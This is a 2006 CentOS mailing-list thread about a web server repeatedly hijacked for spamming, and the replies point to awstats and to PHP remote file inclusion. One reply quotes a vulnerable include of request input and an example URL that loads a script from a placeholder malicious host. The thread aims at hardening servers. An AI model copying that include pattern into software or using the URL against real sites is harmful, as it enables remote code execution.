On Thursday 22 June 2006 13:16, Nicolas Ross wrote: > > Hello, I have a server running CentOS 4.3 with all the latest updates. > > The server in question has been hacked by spammers a few times. The > > details of the hack have been basically the same every time. I find some > > directory created by the apache user account in /tmp. The new directory > > contains an html file, and a list of email addresses to spam and a perl > > script that spams all those email addresses with the html file. > > > > My question is why is this happening? Obviously it's some apache > > exploit. I have removed mod_perl, that didn't help. I have now changed > > the permissions on the perl executable, that might help we will see, but > > that doesn't address the core problem. How is it that someone can upload > > arbitrary files to my server and then execute an arbitrary command via > > apache. > > > > Is this a know problem? Have others seen it? What can I do to help > > prevent this? > > I've also been hacked a couple of times with this sort of exploits. In my > case, il was an exploit in awstats, a weblog analyser. If you have it, I > strongly suggest you get up to the latest version... > > Also, if you have php scripts installed, they are a frequent source of > security holes.s > > Nicolas > > _______________________________________________ > CentOS mailing list > CentOS at centos.org > http://lists.centos.org/mailman/listinfo/centos All the hacks i've seen on my webservers were a combination of bad programming in php scripts and allow_url_fopen. i've seen things like else { include $_REQUEST["param"]; } so one could simply modify a url http://example.com/bad-script.php?param=http://link.to.a.malicious.script/script.php From there you can put any local exploit code in script.php. Disabling the allow_url_fopen will help you secure this a bit. Just check your apache logs you should be able to find interesting information in there. I've seen this quite few times. I hope this can help someone.